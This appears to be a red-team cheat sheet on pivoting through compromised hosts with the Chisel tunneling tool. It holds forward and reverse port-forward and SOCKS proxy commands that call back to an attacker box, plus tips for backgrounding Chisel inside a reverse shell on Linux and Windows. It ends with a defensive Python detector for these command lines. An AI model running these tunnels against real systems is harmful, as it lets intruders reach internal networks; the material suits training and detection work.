
Port Forwarding with Chisel

GitHub

Download from the Releases Page


Usage

Requires a copy of the Chisel binary on:

  • The target host
  • The attacker's host

Chisel also supports authenticated proxies to prevent unwanted connections.


Chisel Advantages

  • Chisel is a portable binary that can be run on the attack box or the target
    • Either party can host the chisel server on a chosen TCP port 
    • Because of this, there is a lot of flexibility where connectivity is restricted
  • No dependencies on SSH daemons on the target
    • If the target is not running an SSH server, no problem



Example Usage

Chisel Server Running on Attack Box

./chisel server \													./chisel client \
--reverse \				Open 127.0.0.1:54321 on attack box			attackbox-ip:51234 \
--port 51234				as a reverse SOCKS proxy				R:127.0.0.1:54321:socks
 _______________													 _______________
|				| <==============[HTTP WebSocket]================[+]|				|
|				|													|				|
|  Attack Box	| -----------------[SSH Tunnel]-------------------> |  Target Box	|
| Chisel Server	|													| Chisel Client	|
|				| <==============[HTTP WebSocket]================[+]|				|
|_______________|													|_______________|


Chisel Server Running on Target

./chisel client \														./chisel server \
targetbox-ip:51234			Open 127.0.0.1:54321 on attack box			--socks5 \
54321:socks						as a forward SOCKS proxy				--port 51234
 _______________													 _______________
|				|[+]==============[HTTP WebSocket]================> |				|
|				|													|				|
|  Attack Box	| -----------------[SSH Tunnel]-------------------> |  Target Box	|
| Chisel Client	|													| Chisel Server	|
|				|[+]==============[HTTP WebSocket]================> |				|
|_______________|													|_______________|



Individual Port Forwarding

  • A service on a compromised host is listening on 127.0.0.1
  • Run the Chisel server on the target and connect from the attack box
  • Specify the port forward on the client
  • Open a port on attack box and forward traffic to remote port
./chisel client \																		./chisel server \
targetbox-ip:51234						Open 127.0.0.1:8001 on attack box				--socks5 \
127.0.0.1:8001:127.0.0.1:8001		and port forward to 127.0.0.1:8001 on target		--port 51234
   ^
   |_______ attack-ip:attack-port:target-ip:target-port
 
 _______________																		________________
|				|[+]=======================[HTTP WebSocket]==========================> |				|
|				|																	   |				|
|  Attack Box	| ---------------------------[SSH Tunnel]----------------------------> |  Target Box	|
| Chisel Client	|																	   | Chisel Server	|
|				|[+]=======================[HTTP WebSocket]==========================> |				|
|_______________|																	   |________________|



Reverse Individual Port Forwarding

  • A service on a compromised host is listening on 127.0.0.1
  • Run the Chisel server on the attack box in reverse mode and connect from the target
  • Specify the port forward on the client
  • Open a port on attack box and forward traffic to remote port
./chisel server \																		./chisel client \
--reverse \							Open 127.0.0.1:8001 on attack box					attackbox-ip:51234 \
--port 51234				and forward in reverse to 127.0.0.1:8001 on target			R:8001:127.0.0.1:8001
   ^																						^
   |___ Run in reverse mode																	|___ R:attack-port:target-address:target-port
   		allows the client to specify															 When using R: will bind to 127.0.0.1 on attack box
        remote port forwards
 
 _______________																		________________
|				| <========================[HTTP WebSocket]=========================[+]|				|
|				|																	   |				|
|  Attack Box	| ---------------------------[SSH Tunnel]----------------------------> |  Target Box	|
| Chisel Server	|																	   | Chisel Client	|
|				| <========================[HTTP WebSocket]=========================[+]|				|
|_______________|																	   |________________|



Forward Dynamic SOCKS Proxy

  • Run the Chisel server on the target box
  • Use the target box as a jump host to reach additional targets routable by the target
  • The traffic flows forward to the target box, which acts as a transparent SOCKS proxy
./chisel client \														./chisel server \
targetbox-ip:51234			Open 127.0.0.1:54321 on attack box			--socks5 \
54321:socks						as a forward SOCKS proxy				--port 51234
 _______________													 _______________
|				|[+]==============[HTTP WebSocket]================> |				|				   _________
|				|													|				|  -------------  |			|
|  Attack Box	| -----------------[SSH Tunnel]-------------------> |  Target Box	|  Proxy Traffic  | Remote  |
| Chisel Client	|													| Chisel Server	|  -------------  | Network |
|				|[+]==============[HTTP WebSocket]================> |				|				  |_________|
|_______________|													|_______________|



Reverse Dynamic SOCKS Proxy

  • Run the Chisel server on the attack box in reverse mode
  • Connect to the Chisel server from the target and specify a reverse port forward
  • The traffic flows through the port on the attack box in reverse to the target box, which acts as a transparent SOCKS proxy
./chisel server \													./chisel client \
--reverse \				Open 127.0.0.1:54321 on attack box			attackbox-ip:51234 \
--port 51234				as a reverse SOCKS proxy				R:127.0.0.1:54321:socks
 _______________													 _______________
|				| <==============[HTTP WebSocket]================[+]|				|				   _________
|				|													|				|  -------------  |			|
|  Attack Box	| -----------------[SSH Tunnel]-------------------> |  Target Box	|  Proxy Traffic  | Remote  |
| Chisel Server	|													| Chisel Client	|  -------------  | Network |
|				| <==============[HTTP WebSocket]================[+]|				|                 |_________|
|_______________|													|_______________|




Reverse Shell Tips

Run Chisel in the Background

Running chisel in the foreground in a reverse shell will render the shell useless. The notes below work around this by running it in the background.

Linux

Client Mode

# Background a process with '&'
# Example command
chisel client 10.0.0.2:8080 R:127.0.0.1:33060:127.0.0.1:3306 R:127.0.0.1:8800:127.0.0.1:80 &

Server Mode

# Background a process with '&'
# Example command
chisel server --port 8080 --reverse &


Windows

PowerShell

Client Mode

# Use the Start-Job cmdlet with a script block
# Example command
$scriptBlock = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('client','10.0.0.2:8080','R:127.0.0.1:33060:127.0.0.1:3306','R:127.0.0.1:8800:127.0.0.1:80') }
Start-Job -ScriptBlock $scriptBlock


Server Mode

Note that in server mode, you'll need to make sure your port is allowed through the firewall.

# Use the Start-Job cmdlet with a script block
# Example command
$scriptBlock = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('server','--port 50001','--socks5') }
Start-Job -ScriptBlock $scriptBlock
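
The remote formats annotated under Individual Port Forwarding and Reverse Individual Port Forwarding, and the backgrounded command lines above, are what shows up in process-creation logs on either host. As an added example (not part of the original notes or the Chisel project), this Python code parses those remotes and flags command lines by argument shape; the function names and sample log lines are constructed, and only the remote shapes shown on this page are handled.

```python
import re

MODES = ("client", "server")

def parse_remote(spec):
    """Parse the remote formats shown on this page:
    [R:][listen-host:]listen-port:target-host:target-port  or  ...:socks
    Returns None for anything else (for example the server address)."""
    reverse = spec.startswith("R:")
    parts = (spec[2:] if reverse else spec).split(":")
    if parts[-1] == "socks":
        listen, target = parts[:-1], "socks"
    else:
        listen, target = parts[:-2], ":".join(parts[-2:])
        if not parts[-1].isdigit():
            return None
    if len(listen) not in (1, 2) or not listen[-1].isdigit():
        return None
    return {
        "reverse": reverse,  # R: means the listener opens on the chisel server
        "listen_host": listen[0] if len(listen) == 2 else None,  # None: not given
        "listen_port": int(listen[-1]),
        "target": target,
    }

def triage(cmdline):
    """Flag a command line by argument shape, not file name, so a renamed
    binary still matches. Returns a finding dict or None."""
    argv = [a.strip("'\"") for a in cmdline.split()]
    if len(argv) < 2 or argv[1] not in MODES:
        return None
    remotes = [r for r in map(parse_remote, argv[2:]) if r]
    socks = "--socks5" in argv or any(r["target"] == "socks" for r in remotes)
    if not (remotes or socks or "--reverse" in argv):
        return None
    return {"exe": re.split(r"[\\/]", argv[0])[-1], "mode": argv[1],
            "reverse": "--reverse" in argv or any(r["reverse"] for r in remotes),
            "socks": socks, "remotes": remotes}

# Constructed process-creation command lines, built from this page's examples.
SAMPLE = [
    "./chisel client 10.0.0.2:8080 R:127.0.0.1:33060:127.0.0.1:3306 R:127.0.0.1:8800:127.0.0.1:80",
    r"C:\Windows\Temp\chisel.exe server --port 50001 --socks5",
    "/tmp/upd client 10.0.0.2:8080 R:127.0.0.1:54321:socks",  # renamed binary
    "/usr/bin/ssh client-01.example.internal",                # unrelated process
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(triage(line) or "no match", "<-", line)
```

A match on argument shape is a triage signal, not proof; correlate it with the outbound WebSocket connection and the new loopback listener before acting on it.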